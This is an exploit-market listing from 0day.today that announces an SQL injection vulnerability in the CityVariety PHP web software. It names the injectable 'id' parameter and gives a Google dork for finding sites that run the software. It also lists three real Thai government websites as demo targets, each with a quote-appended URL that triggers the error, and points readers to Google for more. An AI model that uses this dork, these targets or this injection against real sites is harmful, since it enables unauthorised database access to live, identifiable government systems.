[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

CityVariety SQL Injection Vulnerability

Author
k2ll33d
Risk
[
Security Risk High
]
0day-ID
0day-ID-18203
Category
web applications
Date add
06-05-2012
Platform
php
# Exploit Title: CityVariety MySQL error based injection
# Date: 06/05/2012
# Author: ReZK2LL Team : k2ll33d - Farouk reseau - ala Manai
# Vendor : http://www.cityvariety.co.th
# Version: N/A
# Category: webapps
# Google dork: intext:"powered by CityVariety Corporation" inurl:index.php?options=newsall
# Tested on: win7

---------------------------------
#vuln:
localhost/index.php?options=otop&mode=detail&id=sqli

# Demo sites:
http://nongdindang.go.th/index.php?options=newsall&mode=detail&id=1067'
http://www.sabayoi.go.th/index.php?options=newsall&mode=detail&id=32713'
http://www.bortru.go.th/index.php?options=newsall&mode=detail&id=32707'

and more at google ;)



#  0day.today [2024-11-16]  #